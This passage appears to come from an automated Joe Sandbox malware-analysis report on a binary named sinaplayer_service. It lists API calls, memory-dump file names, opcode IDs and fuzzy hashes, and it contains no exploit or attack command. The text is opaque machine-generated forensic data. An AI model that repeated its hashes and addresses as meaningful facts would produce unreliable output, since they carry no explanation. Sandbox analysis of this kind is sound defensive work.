                                                                                                                                                                                                    • Opcode ID: 7148d11f8377455277c9eb561878720a0bc504f81a61573e241aef5c7b6313ce
                                                                                                                                                                                                    • Instruction ID: 885048d2268165e399d31cbe05e7fa6abfa4a78b24b28ae6358ca8bc3e1cd39d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7148d11f8377455277c9eb561878720a0bc504f81a61573e241aef5c7b6313ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11BF72308911AFCE269B3DAC8456AB3A9EF913357140727E561C71E0D722EC59C7A0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C5C89FA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014), ref: 6C5C8A0C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,?,?,?,?,?,?,?,6C62D0DC,00000014), ref: 6C5C8A21
                                                                                                                                                                                                      • Part of subcall function 6C5692EB: RaiseException.KERNEL32(?,?,?,6C57C7FC,?,?,?,?,?,6C5ADA6A,?,6C57C7FC,?,00000001), ref: 6C569333
                                                                                                                                                                                                      • Part of subcall function 6C5C887D: ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000000,6C5C8AB2,?,?,?,00000014), ref: 6C5C8895
                                                                                                                                                                                                      • Part of subcall function 6C573AF4: TlsGetValue.KERNEL32(6C573DF7,00000000,00000000,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C573AFA
                                                                                                                                                                                                      • Part of subcall function 6C5B9E5E: Concurrency::location::operator==.LIBCMT ref: 6C5B9E8E
                                                                                                                                                                                                      • Part of subcall function 6C5B9E5E: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6C5B9EDA
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?,?,?,00000014), ref: 6C5C8A5A
                                                                                                                                                                                                    • Concurrency::details::TaskStack::Push.LIBCMT ref: 6C5C8A94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Exception$??0exception@std@@??2@?wait@event@Base::Concurrency::location::operator==Concurrency@@ContextCreateH_prolog3_catchPushQueueRaiseStack::TaskThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3358135389-0
                                                                                                                                                                                                    • Opcode ID: f575510cac42a8851ce6865ee36d97d5c90249b842e007eb414b4cae3af1b8bc
                                                                                                                                                                                                    • Instruction ID: 5adea63525db6715c2656ad74ac976403faf429981881c82f268320e2f332179
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f575510cac42a8851ce6865ee36d97d5c90249b842e007eb414b4cae3af1b8bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2217C71A00B05EBCB00DFA5CC90AEDFBB2FF84224B10892ED459A7F10DB359915DB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C5C8AED
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014), ref: 6C5C8AFF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,?,?,?,?,?,?,?,6C62D0DC,00000014), ref: 6C5C8B14
                                                                                                                                                                                                      • Part of subcall function 6C5692EB: RaiseException.KERNEL32(?,?,?,6C57C7FC,?,?,?,?,?,6C5ADA6A,?,6C57C7FC,?,00000001), ref: 6C569333
                                                                                                                                                                                                      • Part of subcall function 6C5C887D: ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000000,6C5C8AB2,?,?,?,00000014), ref: 6C5C8895
                                                                                                                                                                                                      • Part of subcall function 6C573AF4: TlsGetValue.KERNEL32(6C573DF7,00000000,00000000,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C573AFA
                                                                                                                                                                                                      • Part of subcall function 6C5B9FA4: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6C5B9FB2
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?,?,?,00000014), ref: 6C5C8B4D
                                                                                                                                                                                                    • Concurrency::details::TaskStack::Push.LIBCMT ref: 6C5C8B84
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Exception$??0exception@std@@??2@?wait@event@Base::Concurrency@@ContextCreateH_prolog3_catchPushQueueRaiseStack::TaskThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3410968691-0
                                                                                                                                                                                                    • Opcode ID: 1c137105fba1e06c2089281cc31b6e169e7d251e484f2ccbf134ae73bd82d181
                                                                                                                                                                                                    • Instruction ID: ee2c9dea29b228049e948bd2b75e1c3214a31b28788a91097e4433ef86ae546c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c137105fba1e06c2089281cc31b6e169e7d251e484f2ccbf134ae73bd82d181
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8219DB1A00A05DFCB04DFB5CC916ADFBF1BF98218B10892ED556A7F50DB34A815CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2556715357-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2E7E
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2E96
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2EE0
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2EE6
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2EF6
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,6C5BAF12), ref: 6C5BAF79
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,?,6C5BAF12), ref: 6C5BAF81
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,?,?,6C5BAF12), ref: 6C5BAF89
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,?,?,?,6C5BAF12), ref: 6C5BAF91
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,?,?,?,?,6C5BAF12), ref: 6C5BAF97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FlushInterlockedList
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1955102368-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00380F37,?,00000000,00000000,?,?,?,?,?,00380F37), ref: 00398233
                                                                                                                                                                                                    • free.MSVCR120 ref: 00398246
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00380F37), ref: 0039824E
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00398267
                                                                                                                                                                                                    • free.MSVCR120 ref: 00398278
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$AllocByteCharErrorLastMultiStringWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2461177162-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 6C5BCA00
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C5BCA35
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCMT ref: 6C5BCA48
                                                                                                                                                                                                      • Part of subcall function 6C5BEE8E: GetLastError.KERNEL32(?,?,?,6C5A30F2), ref: 6C5BEE94
                                                                                                                                                                                                      • Part of subcall function 6C5BEE8E: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,6C5A30F2), ref: 6C5BEEAA
                                                                                                                                                                                                      • Part of subcall function 6C5BEE8E: _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,6C5A30F2), ref: 6C5BEEB8
                                                                                                                                                                                                      • Part of subcall function 6C5BC9DA: List.LIBCMT ref: 6C5BCA67
                                                                                                                                                                                                      • Part of subcall function 6C5BC9DA: free.MSVCR120(?,?), ref: 6C5BCA73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCoreCurrentDecrementErrorExceptionLastListProxy::SchedulerSubscriptionThreadThrowValuefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3155433331-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120 ref: 0037D5D1
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 0037D5DF
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,?,?), ref: 0037D5F2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120 ref: 0037D60D
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 0037D617
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@memmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1432024918-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?), ref: 00374CD7
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 00374CE5
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,?,?), ref: 00374CF5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00374D0D
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00374D17
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@memmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1432024918-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003756A7
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003756B9
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003756CE
                                                                                                                                                                                                    • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(000000FF), ref: 003756E3
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003756F0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?gbump@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2638700559-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: EncodePointer.KERNEL32(00000000,?,6C57CA0D,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57D411
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: __initp_misc_winsig.LIBCMT ref: 6C57D42C
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetModuleHandleW.KERNEL32(kernel32.dll,00000000), ref: 6C57D448
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6C57D45C
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6C57D46F
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6C57D482
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6C57D495
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6C57D4A8
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6C57D4BB
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6C57D4CE
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C57D4E1
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6C57D4F4
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6C57D507
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6C57D51A
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6C57D52D
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6C57D540
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6C57D553
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6C57D566
                                                                                                                                                                                                    • __crtFlsAlloc.MSVCR120(?,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57CA1F
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,000003BC,?,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57CA3B
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,?,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57CA4F
                                                                                                                                                                                                    • _initptd.MSVCR120(00000000,00000000,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57CA5D
                                                                                                                                                                                                      • Part of subcall function 6C561BFD: _lock.MSVCR120(0000000D), ref: 6C561C41
                                                                                                                                                                                                      • Part of subcall function 6C561BFD: _lock.MSVCR120(0000000C), ref: 6C561C62
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C57CA64
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$__crt_lock$AllocCurrentEncodeHandleModulePointerThreadValue__initp_misc_winsig_calloc_crt_initptd
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4031882113-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00390165,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038F99B
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,00000000,00390165,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038F9AA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038F9B3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,00000000,00390165,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038F9F3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,00000000,00390165,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FA05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$D@std@@@std@@FreeLibraryU?$char_traits@Unlock@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 801975376-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3064670732-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00376402
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 0037640F
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037641C
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037642C
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376440
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3064670732-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _control87.MSVCR120(00000001,?,00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C57C9E1
                                                                                                                                                                                                    • _control87.MSVCR120(00000000,00000000,00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C5B14C2
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C5B14CB
